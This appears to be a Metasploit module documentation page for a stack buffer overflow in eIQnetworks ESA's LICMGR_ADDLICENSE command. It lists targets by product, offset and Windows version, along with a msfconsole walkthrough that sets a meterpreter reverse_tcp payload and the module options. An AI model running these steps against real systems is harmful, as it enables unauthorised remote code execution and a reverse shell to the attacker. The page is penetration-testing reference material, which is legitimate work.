Metasploit Penetration Testing Framework

eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow

This module exploits a stack buffer overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This module has only been tested against ESA v2.1.13.

Rank

Average

Authors

MC < mc [at] metasploit.com >
ri0t < ri0t [at] ri0tnet.net >
kf < kf_list [at] digitalmunition.com >

References

Exploit Targets

0 - EnterpriseSecurityAnalyzerv21 Universal
1 - EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English
2 - EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2
3 - EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1
4 - Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English
5 - Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2
6 - Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
7 - Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English
8 - Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2
9 - Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
10 - iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English
11 - iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2
12 - iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
13 - SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English
14 - SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2
15 - SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
16 - Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English
17 - Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2
18 - Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1
19 - Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English
20 - Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2
21 - Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/misc/eiqnetworks_esa
msf exploit(eiqnetworks_esa) > show payloads
msf exploit(eiqnetworks_esa) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(eiqnetworks_esa) > set LHOST [MY IP ADDRESS]
msf exploit(eiqnetworks_esa) > set RHOST [TARGET IP]
msf exploit(eiqnetworks_esa) > show targets
msf exploit(eiqnetworks_esa) > set TARGET [TARGET ID]
msf exploit(eiqnetworks_esa) > exploit

Module Options

RHOST	The target address
RPORT	The target port (default: 10616)
CHOST	The local client address
CPORT	The local client port
ConnectTimeout	Maximum number of seconds to establish a TCP connection
ContextInformationFile	The information file that contains context information
DisablePayloadHandler	Disable the handler code for the selected payload
EnableContextEncoding	Use transient context when encoding payloads
Proxies	Use a proxy chain
SSL	Negotiate SSL for outgoing connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE	Specify the workspace for this module
WfsDelay	Additional delay when waiting for a session
TCP::max_send_size	Maxiumum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)

OSVDB:	CVE:
BID:	MSB:
TEXT: